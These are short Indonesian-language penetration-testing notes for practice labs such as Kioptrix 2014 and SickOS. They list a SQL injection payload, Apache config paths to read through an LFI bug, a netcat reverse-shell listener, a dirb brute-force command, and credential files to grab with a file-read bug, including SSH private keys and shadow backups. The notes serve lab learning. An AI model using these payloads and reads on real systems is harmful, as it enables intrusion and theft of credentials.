coba sql injection. 1'or'1--
Misal ada port 8080 forbidden, namun di port 80 ada bug LFI. Kalau kita gak bisa ngapa-ngapain coba cari config apache seperti httpd.conf
/etc/apache2/apache2.conf– Ini biasanya digunakan di keluarga distro Debian/Ubuntu/etc/httpd/httpd.conf– Kalau ini akan ditemukan di keluarga distro Linux RHEL/CentOS/Fedora/etc/httpd/conf/httpd.conf– Ada yang seperti ini juga di CentOSC:\xampp\apache\conf\httpd.conf– Letaknya kalau di XAMPPusr/local/etc/apache22/httpd.conf- FreeBSD
Kalau sudah ketemu, cek kenapa port 8080 forbidden, biasanya harus pakai user-agent tertentu
Latihan : Kioptrix 2014
Cek pada endpoint apakah ada method
OPTIONS /test/ HTTP/1.1
Host: 192.168.1.10
Latihan : SickOS
nc -lvnp 443
RECON RECON RECON
Coba pakai dirb
dirb http://10.10.10.10
gunakan wordlist yang beda-beda
Kalau dapat Bug File read bisa baca
/home/user/.ssh/id_rsa
/etc/passwd
/var/backups/shadow.bak